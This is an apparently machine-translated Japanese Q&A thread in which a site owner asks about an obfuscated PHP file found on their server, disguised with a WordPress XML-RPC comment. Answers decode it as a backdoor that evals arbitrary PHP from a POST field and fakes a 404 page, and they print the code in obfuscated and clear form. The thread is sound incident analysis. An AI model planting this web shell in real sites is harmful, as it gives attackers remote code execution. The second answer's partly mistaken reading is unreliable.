ホスティングの悪意のあるファイルの目的

Question

こんにちは私はサーバー上に悪意のあるPHPファイルがあり、私は自分のコンピュータにそのファイルをダウンロードしました。このファイルには、小さな悪質なコードが含まれており、evalコマンドを実行しようとしています。ファイルがサーバーに残っていることにどのような影響があるのか​​分かりません。誰でもこのコードで私に返信してください。

$q22 = "fo\\@5HL[\r.S4awj\t)n`x}\"UZ\$gr(+JO2i* I;3XCvBk>m,NzEc_6qD?9PYhuV:bl|WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR'<sT"; 

$GLOBALS['owyeq61'] = ${$q22[50].$q22[56].$q22[30].$q22[10].$q22[97]}; 
$GLOBALS['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 

if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 

$GLOBALS['tmiok36']($q22[5].$q22[97].$q22[97].$q22[56].$q22[73].$q22[84].$q22[9].$q22[88].$q22[34].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86]); 

echo $q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
/** 
* XML-RPC protocol support for WordPress 
* 
* @package WordPress 
*/ 

/** 
* Whether this is an XML-RPC Request 
*/ 

Answer 1

コードのこの作品は、フィールドmc589a12eで、POST要求にあなたのページに送信された任意のPHPコードを実行します。

これは$q22の連結を評価した後のコードです：

$GLOBALS['owyeq61'] = ${'_POST'}; 
$GLOBALS['tmiok36'] = 'header'; 
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found'); 
echo '<h1>404 Not Found</h1> 
The page that you have requested could not be found.'; 

Answer 2

私はサンドボックスモードでコードを実行します。

$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97]; 
// return POST 

$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 
// return Header 

$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[ 46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
// returns 404 Page not found 

しかし、その評価は厄介です。それはグローバルヘッダmc589a12eを探していますので、私はどこかでwordpressに設定されていると思うので、スクリプトはこのグローバルをHTTP/1.0 404 Not Foundに書き換えます。多分セキュリティチェックをバイパスするかもしれません。

あなたのサーバーからこのファイルを削除し、あなたのシステム/ユーザ/ライティングのチェック権限を更新することは言うまでもないです。

たぶん私は、ホストからサイトを削除し、データベースを削除し、最新のWordpress、プラグインのバージョンにあなたのローカルバージョンを更新し、ホスティング上の任意のユーザー名/パスワードを（変更となり https://codex.wordpress.org/FAQ_My_site_was_hacked